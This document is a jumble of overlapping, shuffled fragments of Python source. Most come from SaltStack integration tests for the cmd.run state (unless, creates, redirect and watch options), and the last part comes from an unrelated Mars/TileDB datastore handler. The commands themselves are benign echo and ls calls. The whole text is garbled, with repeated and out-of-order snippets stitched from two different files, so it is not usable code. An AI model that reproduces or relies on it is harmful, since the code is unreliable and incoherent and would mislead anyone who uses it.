self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self):", "already there ''' state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file)", "reads \"unless execution succeeded\", or similar, # then the unless", "state of run_watch ''' def setUp(self): self.state_name = 'run_watch' state_filename", "tree. 
pass super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self): ''' test cmd.run unless", "unless: echo cheese > {1} '''.format(self.test_tmp_path, self.test_file))) ret = self.run_function('state.sls',", "cwd=tempfile.gettempdir()) self.assertSaltTrueReturn(ret) def test_test_run_simple(self): ''' cmd.run test interface ''' ret", "SaltReturnAssertsMixin # Import salt libs import salt.utils IS_WINDOWS = salt.utils.is_windows()", "of the tests create the sls files in the test", "import ModuleCase from tests.support.paths import TMP_STATE_TREE from tests.support.mixins import SaltReturnAssertsMixin", "bailed out after the first unless command succeeded, # which", "'w') as fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run: - unless: echo cheese", "changed=true - cwd: / - stateful: True biscuits: cmd.wait: -", "def test_run_creates_exists(self): ''' test cmd.run creates already there ''' state_key", "'run_watch' state_filename = self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename)", "biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run: -", "super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self): ''' test cmd.run unless ''' state_key", "{0}: cmd.run '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase,", "cmd.wait: - name: echo biscuits - cwd: / - watch:", "command in the state. If the comment reads \"unless execution", "pass super(CMDRunRedirectTest, self).tearDown() def test_run_unless(self): ''' test cmd.run unless '''", "'.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp() def tearDown(self): os.remove(self.state_file)", "must assert against the comment here to make sure the", "(The fix is in PR #35545.) ''' sls = self.run_function('state.sls',", "with shell redirect ''' state_key = 'cmd_|-echo test > {0}_|-echo", "{0}: cmd.run: - creates: {0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name])", "first cmd in the list will pass, but the second", "{0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo", "ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate", "redirect ''' state_key = 'cmd_|-echo test > {0}_|-echo test >", "def test_run_creates_new(self): ''' test cmd.run creates not there ''' os.remove(self.test_file)", "that we want to remove # As some of the", "self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate", "state_filename) # Create the testfile and release the handle fd,", "test > {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo", "This tests the fix for issue #35384. 
(The fix is", "= self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self): ''' test", "to make sure the comment reads that the # command", "fb_.write(textwrap.dedent(''' {0}: cmd.run: - unless: echo cheese > {1} '''.format(self.test_tmp_path,", "files around that we want to remove # As some", "some are using files in the integration test file state", "''' sls = self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) # We must assert", "def test_run_unless_multiple_cmds(self): ''' test cmd.run using multiple unless options where", "test cmd.run watch ''' saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key =", "= 'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' saltines:", "= 'run_redirect' state_filename = self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE,", "import errno import os import textwrap import tempfile # Import", "fb_: fb_.write(textwrap.dedent(''' echo >> {0}: cmd.run: - creates: {0} '''.format(self.test_file)))", "= 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w')", "unless command succeeded, # which is the bug we're regression", "creates: {0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4)", "biscuits: cmd.wait: - name: echo biscuits - cwd: / -", "'''.format(self.test_tmp_path, self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): '''", "''' test cmd.run creates already there ''' state_key = 'cmd_|-echo", "except OSError: # Not all of the tests leave files", "cmd.run: - creates: {0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result'])", "self.state_file = os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp() def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest,", "# -*- coding: utf-8 -*- ''' Tests for the file", "- watch: - cmd: saltines ''')) ret = self.run_function('state.sls', [self.state_name])", "around that we want to remove # As some of", "for issue #35384. (The fix is in PR #35545.) '''", "for the file state ''' # Import python libs from", "cmd.run with shell redirect ''' state_key = 'cmd_|-echo test >", "ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): ''' test cmd.run", "textwrap import tempfile # Import Salt Testing libs from tests.support.case", "in PR #35545.) ''' sls = self.run_function('state.sls', mods='issue-35384') self.assertSaltTrueReturn(sls) #", "cmd.run '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin):", "and release the handle fd, self.test_file = tempfile.mkstemp() try: os.close(fd)", "errno.EBADF: raise exc # Create the testfile and release the", "biscuits - cwd: / - watch: - cmd: saltines '''))", "which is the bug we're regression testing for. 
self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'],", "changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w') as fb_:", "we made it to the last unless # command in", "fail. This tests the fix for issue #35384. (The fix", "self.test_file): try: os.remove(path) except OSError: # Not all of the", "# Not all of the tests leave files around that", "- cmd: saltines ''')) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[saltines_key]['result']) self.assertTrue(ret[biscuits_key]['result'])", "except OSError as exc: if exc.errno != errno.EBADF: raise exc", "# And some are using files in the integration test", "handle fd, self.test_tmp_path = tempfile.mkstemp() try: os.close(fd) except OSError as", "self.assertTrue(ret[state_key]['result']) class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state of", "= os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp() def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown()", "self.assertTrue(ret[state_key]['result']) def test_run_unless_multiple_cmds(self): ''' test cmd.run using multiple unless options", "utf-8 -*- ''' Tests for the file state ''' #", "self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self): ''' test cmd.run", "OSError: # Not all of the tests leave files around", "errno import os import textwrap import tempfile # Import Salt", "libs from __future__ import absolute_import import errno import os import", "salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo >> {0}: cmd.run: -", "import os import textwrap import tempfile # Import Salt Testing", "the file state ''' # Import python libs from __future__", "+ '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) # Create the testfile", "using multiple unless options where the first cmd in the", "= 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path) with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run:", "tests.support.case import ModuleCase from tests.support.paths import TMP_STATE_TREE from tests.support.mixins import", "leave files around that we want to remove # As", "from __future__ import absolute_import import errno import os import textwrap", "= self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) super(CMDRunWatchTest, self).setUp()", "sls files in the test itself, # And some are", "Not all of the tests leave files around that we", "{0}: cmd.run: - unless: echo cheese > {1} '''.format(self.test_tmp_path, self.test_file)))", "- name: echo biscuits - cwd: / - watch: -", "remove # As some of the tests create the sls", "with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' echo >> {0}: cmd.run:", "cmd = 'dir' if IS_WINDOWS else 'ls' ret = self.run_state('cmd.run',", "Salt Testing libs from tests.support.case import ModuleCase from tests.support.paths import", "second will fail. 
This tests the fix for issue #35384.", "cmd state of run_redirect ''' def setUp(self): self.state_name = 'run_redirect'", "from tests.support.mixins import SaltReturnAssertsMixin # Import salt libs import salt.utils", "tests create the sls files in the test itself, #", "there ''' os.remove(self.test_file) state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file)", "as fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run: - unless: echo cheese >", "echo biscuits - cwd: / - watch: - cmd: saltines", "itself, # And some are using files in the integration", "test cmd.run creates already there ''' state_key = 'cmd_|-echo >>", "fix for issue #35384. (The fix is in PR #35545.)", "''' test cmd.run watch ''' saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key", "- cwd: / - watch: - cmd: saltines ''')) ret", "= salt.utils.is_windows() class CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state", "state_filename = self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) #", "def tearDown(self): os.remove(self.state_file) super(CMDRunWatchTest, self).tearDown() def test_run_watch(self): ''' test cmd.run", "mods='issue-35384') self.assertSaltTrueReturn(sls) # We must assert against the comment here", "def test_run_redirect(self): ''' test cmd.run with shell redirect ''' state_key", "{0} '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def", "cmd.run ''' cmd = 'dir' if IS_WINDOWS else 'ls' ret", "unless # command in the state. If the comment reads", "- stateful: True biscuits: cmd.wait: - name: echo biscuits -", "or similar, # then the unless state run bailed out", "name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the", "''' # Import python libs from __future__ import absolute_import import" ]
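Unlike the other tests in CMDRunRedirectTest, test_run_unless_multiple_cmds loads its 'issue-35384' state from the integration file state tree instead of writing it inline. A minimal sketch of how that fixture could be written inline, following the same textwrap.dedent pattern the surrounding tests use; only the state id cmd_run_unless_multiple and the name echo "hello" are implied by the state key asserted above, while the unless commands themselves are assumptions chosen so the first passes and the second fails:

import textwrap

# Hypothetical inline version of the issue-35384 fixture -- the real sls file
# ships in the integration file state tree and may differ.
ISSUE_35384_SLS = textwrap.dedent('''
    cmd_run_unless_multiple:
      cmd.run:
        - name: echo "hello"
        - unless:
          - 'true'     # first unless command succeeds...
          - 'false'    # ...the second fails, so the state must still run
    ''')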
[ "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "* chunk.ndim, dtype=chunk.dtype) else: # sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if", "datastore from .utils import get_tiledb_ctx def _store_tiledb(ctx, chunk): tiledb_ctx =", "tiledb = None from ...lib.sparse import SparseNDArray from ...lib.sparse.core import", "# # Licensed under the Apache License, Version 2.0 (the", "compliance with the License. # You may obtain a copy", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "2.0 (the \"License\"); # you may not use this file", "agreed to in writing, software # distributed under the License", "file except in compliance with the License. # You may", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "Unless required by applicable law or agreed to in writing,", "except ImportError: # pragma: no cover tiledb = None from", "to_store.nnz > 0: with tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as", "if to_store.shape[0] == 1 else to_store.row vec += axis_offsets[0] arr[vec]", "if chunk.ndim == 1: vec = to_store.col if to_store.shape[0] ==", "1999-2018 Alibaba Group Holding Ltd. # # Licensed under the", "distributed under the License is distributed on an \"AS IS\"", "chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets if not chunk.issparse(): # dense to_store", "slcs.append(slice(axis_offset, axis_offset + axis_length)) with tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp)", "-*- # Copyright 1999-2018 Alibaba Group Holding Ltd. # #", "permissions and # limitations under the License. import numpy as", "SparseNDArray from ...lib.sparse.core import sps from ..expressions import datastore from", "1 else to_store.row vec += axis_offsets[0] arr[vec] = to_store.data else:", "the specific language governing permissions and # limitations under the", "#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright 1999-2018", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "timestamp = chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets if not chunk.issparse(): #", "ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler(): from ...executor", "chunk.issparse(): # dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = [] for", "express or implied. # See the License for the specific", "applicable law or agreed to in writing, software # distributed", "except in compliance with the License. # You may obtain", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "limitations under the License. 
import numpy as np try: import", "import datastore from .utils import get_tiledb_ctx def _store_tiledb(ctx, chunk): tiledb_ctx", "axis_offset = axis_offsets[axis] axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset + axis_length))", "tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr: arr[tuple(slcs)] = to_store", "chunk.ndim, dtype=chunk.dtype) else: # sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz", "Licensed under the Apache License, Version 2.0 (the \"License\"); #", "tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri key = chunk.op.tiledb_key timestamp", "arr[tuple(slcs)] = to_store ctx[chunk.key] = np.empty((0,) * chunk.ndim, dtype=chunk.dtype) else:", "> 0: with tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr:", "arr[i, j] = to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape)", "not use this file except in compliance with the License.", "axis in range(chunk.ndim): axis_offset = axis_offsets[axis] axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset,", "try: import tiledb except ImportError: # pragma: no cover tiledb", "np.empty((0,) * chunk.ndim, dtype=chunk.dtype) else: # sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo()", ".utils import get_tiledb_ctx def _store_tiledb(ctx, chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri", "+ axis_offsets[1] arr[i, j] = to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0),", "= get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri key = chunk.op.tiledb_key timestamp =", "writing, software # distributed under the License is distributed on", "in writing, software # distributed under the License is distributed", "Ltd. # # Licensed under the Apache License, Version 2.0", "you may not use this file except in compliance with", "_store_tiledb(ctx, chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri key =", "# Licensed under the Apache License, Version 2.0 (the \"License\");", "language governing permissions and # limitations under the License. import", "not chunk.issparse(): # dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = []", "as arr: if chunk.ndim == 1: vec = to_store.col if", "range(chunk.ndim): axis_offset = axis_offsets[axis] axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset +", "to_store.shape[0] == 1 else to_store.row vec += axis_offsets[0] arr[vec] =", "ImportError: # pragma: no cover tiledb = None from ...lib.sparse", "chunk.op.axis_offsets if not chunk.issparse(): # dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs", "with tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr: arr[tuple(slcs)] =", "1: vec = to_store.col if to_store.shape[0] == 1 else to_store.row", "axis_offsets[0] arr[vec] = to_store.data else: i, j = to_store.row +", "= SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler(): from ...executor import", "# pragma: no cover tiledb = None from ...lib.sparse import", "use this file except in compliance with the License. 
#", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "= chunk.op.axis_offsets if not chunk.issparse(): # dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key])", "axis_offset + axis_length)) with tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as", "arr[vec] = to_store.data else: i, j = to_store.row + axis_offsets[0],", "= np.empty((0,) * chunk.ndim, dtype=chunk.dtype) else: # sparse to_store =", "to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = [] for axis in range(chunk.ndim):", "else to_store.row vec += axis_offsets[0] arr[vec] = to_store.data else: i,", "arr: if chunk.ndim == 1: vec = to_store.col if to_store.shape[0]", "dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler(): from ...executor import register register(datastore.TensorTileDBDataStore, _store_tiledb)", "coding: utf-8 -*- # Copyright 1999-2018 Alibaba Group Holding Ltd.", "-*- coding: utf-8 -*- # Copyright 1999-2018 Alibaba Group Holding", "CONDITIONS OF ANY KIND, either express or implied. # See", "chunk.op.tiledb_uri key = chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets", "sps from ..expressions import datastore from .utils import get_tiledb_ctx def", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "or implied. # See the License for the specific language", "License is distributed on an \"AS IS\" BASIS, # WITHOUT", "np try: import tiledb except ImportError: # pragma: no cover", "License. # You may obtain a copy of the License", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "License, Version 2.0 (the \"License\"); # you may not use", "SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler(): from ...executor import register", "# You may obtain a copy of the License at", "cover tiledb = None from ...lib.sparse import SparseNDArray from ...lib.sparse.core", "KIND, either express or implied. # See the License for", "specific language governing permissions and # limitations under the License.", "i, j = to_store.row + axis_offsets[0], to_store.col + axis_offsets[1] arr[i,", "= to_store.row + axis_offsets[0], to_store.col + axis_offsets[1] arr[i, j] =", "under the License is distributed on an \"AS IS\" BASIS,", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "chunk.ndim == 1: vec = to_store.col if to_store.shape[0] == 1", "chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri key = chunk.op.tiledb_key", "License for the specific language governing permissions and # limitations", "the License. import numpy as np try: import tiledb except", "= to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler():", "uri, mode='w', key=key, timestamp=timestamp) as arr: if chunk.ndim == 1:", "with tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr: if chunk.ndim", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "axis_offsets[0], to_store.col + axis_offsets[1] arr[i, j] = to_store.data ctx[chunk.key] =", "utf-8 -*- # Copyright 1999-2018 Alibaba Group Holding Ltd. 
#", "numpy as np try: import tiledb except ImportError: # pragma:", "None from ...lib.sparse import SparseNDArray from ...lib.sparse.core import sps from", "axis_offsets = chunk.op.axis_offsets if not chunk.issparse(): # dense to_store =", "axis_length)) with tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr: arr[tuple(slcs)]", "dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = [] for axis in", "License. import numpy as np try: import tiledb except ImportError:", "from ...lib.sparse.core import sps from ..expressions import datastore from .utils", "key=key, timestamp=timestamp) as arr: if chunk.ndim == 1: vec =", "to_store.col if to_store.shape[0] == 1 else to_store.row vec += axis_offsets[0]", "axis_offsets[1] arr[i, j] = to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype),", "the License for the specific language governing permissions and #", "pragma: no cover tiledb = None from ...lib.sparse import SparseNDArray", "to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz > 0: with tiledb.SparseArray(tiledb_ctx, uri,", "vec = to_store.col if to_store.shape[0] == 1 else to_store.row vec", "+= axis_offsets[0] arr[vec] = to_store.data else: i, j = to_store.row", "(the \"License\"); # you may not use this file except", "import numpy as np try: import tiledb except ImportError: #", "Apache License, Version 2.0 (the \"License\"); # you may not", "uri, mode='w', key=key, timestamp=timestamp) as arr: arr[tuple(slcs)] = to_store ctx[chunk.key]", "# you may not use this file except in compliance", "under the License. import numpy as np try: import tiledb", "...lib.sparse.core import sps from ..expressions import datastore from .utils import", "either express or implied. # See the License for the", "get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri key = chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp", "= np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = [] for axis in range(chunk.ndim): axis_offset", "= chunk.op.tiledb_uri key = chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp axis_offsets =", "# sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz > 0: with", "= ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz > 0: with tiledb.SparseArray(tiledb_ctx, uri, mode='w',", "= to_store.data else: i, j = to_store.row + axis_offsets[0], to_store.col", "OR CONDITIONS OF ANY KIND, either express or implied. #", "chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets if not chunk.issparse():", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr: if chunk.ndim ==", "...lib.sparse import SparseNDArray from ...lib.sparse.core import sps from ..expressions import", "the License is distributed on an \"AS IS\" BASIS, #", "in compliance with the License. # You may obtain a", "np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = [] for axis in range(chunk.ndim): axis_offset =", "dtype=chunk.dtype) else: # sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz >", "# -*- coding: utf-8 -*- # Copyright 1999-2018 Alibaba Group", "software # distributed under the License is distributed on an", "Holding Ltd. # # Licensed under the Apache License, Version", "governing permissions and # limitations under the License. 
import numpy", "# # Unless required by applicable law or agreed to", "vec += axis_offsets[0] arr[vec] = to_store.data else: i, j =", "= axis_offsets[axis] axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset + axis_length)) with", "from ...lib.sparse import SparseNDArray from ...lib.sparse.core import sps from ..expressions", "== 1 else to_store.row vec += axis_offsets[0] arr[vec] = to_store.data", "ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz > 0: with tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key,", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "to_store.col + axis_offsets[1] arr[i, j] = to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0,", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "tiledb except ImportError: # pragma: no cover tiledb = None", "ctx[chunk.key] = np.empty((0,) * chunk.ndim, dtype=chunk.dtype) else: # sparse to_store", "mode='w', key=key, timestamp=timestamp) as arr: if chunk.ndim == 1: vec", "Alibaba Group Holding Ltd. # # Licensed under the Apache", "j] = to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape) def", "Version 2.0 (the \"License\"); # you may not use this", "timestamp=timestamp) as arr: if chunk.ndim == 1: vec = to_store.col", "to_store.row + axis_offsets[0], to_store.col + axis_offsets[1] arr[i, j] = to_store.data", "as np try: import tiledb except ImportError: # pragma: no", "law or agreed to in writing, software # distributed under", "..expressions import datastore from .utils import get_tiledb_ctx def _store_tiledb(ctx, chunk):", "Copyright 1999-2018 Alibaba Group Holding Ltd. # # Licensed under", "= chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets if not chunk.issparse(): # dense", "if not chunk.issparse(): # dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs =", "else: i, j = to_store.row + axis_offsets[0], to_store.col + axis_offsets[1]", "python # -*- coding: utf-8 -*- # Copyright 1999-2018 Alibaba", "= to_store.col if to_store.shape[0] == 1 else to_store.row vec +=", "for axis in range(chunk.ndim): axis_offset = axis_offsets[axis] axis_length = chunk.op.input.shape[axis]", "else: # sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz > 0:", "= to_store ctx[chunk.key] = np.empty((0,) * chunk.ndim, dtype=chunk.dtype) else: #", "get_tiledb_ctx def _store_tiledb(ctx, chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri", "axis_offsets[axis] axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset + axis_length)) with tiledb.DenseArray(tiledb_ctx,", "chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset + axis_length)) with tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key,", "implied. 
# See the License for the specific language governing", "under the Apache License, Version 2.0 (the \"License\"); # you", "timestamp=timestamp) as arr: arr[tuple(slcs)] = to_store ctx[chunk.key] = np.empty((0,) *", "\"License\"); # you may not use this file except in", "+ axis_offsets[0], to_store.col + axis_offsets[1] arr[i, j] = to_store.data ctx[chunk.key]", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset + axis_length)) with tiledb.DenseArray(tiledb_ctx, uri,", "j = to_store.row + axis_offsets[0], to_store.col + axis_offsets[1] arr[i, j]", "to_store ctx[chunk.key] = np.empty((0,) * chunk.ndim, dtype=chunk.dtype) else: # sparse", "to_store.row vec += axis_offsets[0] arr[vec] = to_store.data else: i, j", "to_store.data ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler(): from", "by applicable law or agreed to in writing, software #", "# distributed under the License is distributed on an \"AS", "OF ANY KIND, either express or implied. # See the", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "no cover tiledb = None from ...lib.sparse import SparseNDArray from", "may obtain a copy of the License at # #", "# Unless required by applicable law or agreed to in", "ANY KIND, either express or implied. # See the License", "See the License for the specific language governing permissions and", "and # limitations under the License. import numpy as np", "the License. # You may obtain a copy of the", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "for the specific language governing permissions and # limitations under", "if to_store.nnz > 0: with tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp)", "# Copyright 1999-2018 Alibaba Group Holding Ltd. 
# # Licensed", "0: with tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr: if", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "to in writing, software # distributed under the License is", "= chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset + axis_length)) with tiledb.DenseArray(tiledb_ctx, uri, mode='w',", "# dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = [] for axis", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "# See the License for the specific language governing permissions", "import sps from ..expressions import datastore from .utils import get_tiledb_ctx", "import get_tiledb_ctx def _store_tiledb(ctx, chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri =", "import SparseNDArray from ...lib.sparse.core import sps from ..expressions import datastore", "def _store_tiledb(ctx, chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri key", "= chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets if not", "key=key, timestamp=timestamp) as arr: arr[tuple(slcs)] = to_store ctx[chunk.key] = np.empty((0,)", "mode='w', key=key, timestamp=timestamp) as arr: arr[tuple(slcs)] = to_store ctx[chunk.key] =", "== 1: vec = to_store.col if to_store.shape[0] == 1 else", "You may obtain a copy of the License at #", "slcs = [] for axis in range(chunk.ndim): axis_offset = axis_offsets[axis]", "may not use this file except in compliance with the", "or agreed to in writing, software # distributed under the", "as arr: arr[tuple(slcs)] = to_store ctx[chunk.key] = np.empty((0,) * chunk.ndim,", "arr: arr[tuple(slcs)] = to_store ctx[chunk.key] = np.empty((0,) * chunk.ndim, dtype=chunk.dtype)", "Group Holding Ltd. # # Licensed under the Apache License,", "required by applicable law or agreed to in writing, software", "uri = chunk.op.tiledb_uri key = chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp axis_offsets", "= [] for axis in range(chunk.ndim): axis_offset = axis_offsets[axis] axis_length", "= None from ...lib.sparse import SparseNDArray from ...lib.sparse.core import 